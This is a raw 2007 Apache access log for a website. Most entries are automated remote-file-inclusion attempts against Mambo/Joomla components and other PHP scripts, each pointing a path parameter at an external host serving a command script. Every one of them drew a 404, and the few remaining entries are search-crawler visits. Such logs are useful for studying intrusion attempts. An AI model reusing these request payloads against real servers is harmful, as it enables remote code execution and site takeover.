74.124.198.61 - - [16/Sep/2007:20:02:30 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:20:03:32 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:20:03:32 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:20:03:35 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:20:03:35 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
74.6.26.100 - - [16/Sep/2007:20:03:39 -0700] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.75.21.221 - - [16/Sep/2007:20:04:09 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.turismeruralpallarsjussa.info/error/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:20:04:12 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.19.107.174 - - [16/Sep/2007:20:04:55 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.61.203.236 - - [16/Sep/2007:20:05:18 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.61.203.236 - - [16/Sep/2007:20:05:18 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:20:06:44 -0700] "GET /logs/access.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:20:06:44 -0700] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.84.247.218 - - [16/Sep/2007:20:07:20 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.84.247.218 - - [16/Sep/2007:20:07:21 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.19.107.174 - - [16/Sep/2007:20:08:16 -0700] "GET /logs/access.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.19.107.174 - - [16/Sep/2007:20:08:17 -0700] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.46.176.222 - - [16/Sep/2007:20:11:25 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.46.176.222 - - [16/Sep/2007:20:11:25 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:13:05 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:13:05 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:13:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.58 - - [16/Sep/2007:20:13:06 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:20:15:32 -0700] "GET /logs/template.php?pagina=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:20:15:32 -0700] "GET /template.php?pagina=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:20:19:39 -0700] "GET /logs/access_070716.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:20:19:39 -0700] "GET /logs/access_070716.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:20:19:50 -0700] "GET /logs/index.php?p=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:20:19:50 -0700] "GET /index.php?p=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:21:59 -0700] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:21:59 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:21:59 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.180.173.59 - - [16/Sep/2007:20:26:58 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.wendelcruz.com/galeria/include/service.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:20:28:54 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:20:28:55 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.46.201.169 - - [16/Sep/2007:20:28:55 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.28.220 - - [16/Sep/2007:20:33:55 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:34:43 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:34:43 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:34:43 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:20:36:08 -0700] "GET /logs/access_070820.log//classes/adodbt/sql.php?classes_dir=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.171.105.7 - - [16/Sep/2007:20:43:47 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.171.105.7 - - [16/Sep/2007:20:43:48 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.110.128.68 - - [16/Sep/2007:20:44:21 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.110.128.68 - - [16/Sep/2007:20:44:21 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:20:47:10 -0700] "GET /logs/p.php?p=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
164.81.22.52 - - [16/Sep/2007:20:47:10 -0700] "GET /p.php?p=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.243.81.147 - - [16/Sep/2007:20:49:25 -0700] "GET /administrator/index2.php?mosConfig_absolute_path=http://www.tigerkurt.de/tool20.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
216.219.170.122 - - [16/Sep/2007:20:53:22 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.219.170.122 - - [16/Sep/2007:20:53:28 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:20:58:36 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:20:58:43 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
64.5.51.70 - - [16/Sep/2007:20:58:43 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
65.61.203.236 - - [16/Sep/2007:20:58:44 -0700] "GET /logs/!scanhttp://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.61.203.236 - - [16/Sep/2007:20:58:44 -0700] "GET /!scanhttp://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:20:58:45 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:20:58:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
74.6.19.225 - - [16/Sep/2007:21:01:59 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:21:02:28 -0700] "GET /logs/index.php?p=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:21:02:28 -0700] "GET /index.php?p=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.84.247.218 - - [16/Sep/2007:21:04:02 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.84.247.218 - - [16/Sep/2007:21:04:02 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.84.247.218 - - [16/Sep/2007:21:04:02 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.46.176.222 - - [16/Sep/2007:21:06:38 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.46.176.222 - - [16/Sep/2007:21:06:38 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.50.136.72 - - [16/Sep/2007:21:08:43 -0700] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:21:11:51 -0700] "GET /logs/access_070618.log/components/com_simpleboard/image_upload.php?sbp=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.28.32 - - [16/Sep/2007:21:12:50 -0700] "GET /logs/access_070910.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:21:16:50 -0700] "GET /logs/index2.php?=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:21:16:50 -0700] "GET /index2.php?=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.107 - - [16/Sep/2007:21:19:34 -0700] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:21:19:43 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:21:19:43 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:21:21:28 -0700] "GET /logs/index2.php?=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:21:21:28 -0700] "GET /index2.php?=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:21:22:57 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.58 - - [16/Sep/2007:21:22:58 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.58 - - [16/Sep/2007:21:22:58 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.58 - - [16/Sep/2007:21:23:42 -0700] "GET /logs/scripts.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.79.31.97 - - [16/Sep/2007:21:24:02 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
194.79.31.97 - - [16/Sep/2007:21:24:03 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.73.202 - - [16/Sep/2007:21:24:57 -0700] "GET /logs/access_070917.log HTTP/1.1" 200 3385779 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
89.76.191.234 - - [16/Sep/2007:21:25:35 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.84.247.218 - - [16/Sep/2007:21:26:54 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.219.170.122 - - [16/Sep/2007:21:33:12 -0700] "GET /logs/access_070604.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.219.170.122 - - [16/Sep/2007:21:34:06 -0700] "GET /logs/access_070611.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.171.105.7 - - [16/Sep/2007:21:38:10 -0700] "GET /logs/access_070604.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.171.105.7 - - [16/Sep/2007:21:38:34 -0700] "GET /logs/access_070611.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:41:34 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:41:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:41:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:41:35 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:41:57 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:21:41:57 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:41:57 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:46:09 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.73.27 - - [16/Sep/2007:21:46:21 -0700] "GET /php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [16/Sep/2007:21:46:49 -0700] "GET /php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:47:17 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:47:18 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:21:48:25 -0700] "GET /logs/index2.php?content=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:21:48:25 -0700] "GET /index2.php?content=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:49:03 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.124.198.61 - - [16/Sep/2007:21:49:03 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:21:49:03 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:49:03 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:49:03 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:51:18 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:51:22 -0700] "GET /logs/access_070604.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:52:21 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:52:21 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:52:21 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:21:52:22 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.19.214 - - [16/Sep/2007:21:55:05 -0700] "GET /logs/scripts.log HTTP/1.0" 200 22204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:21:55:14 -0700] "GET /index.php?inc=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.126.237.102 - - [16/Sep/2007:21:56:14 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.10 - - [16/Sep/2007:21:58:33 -0700] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:21:59:20 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
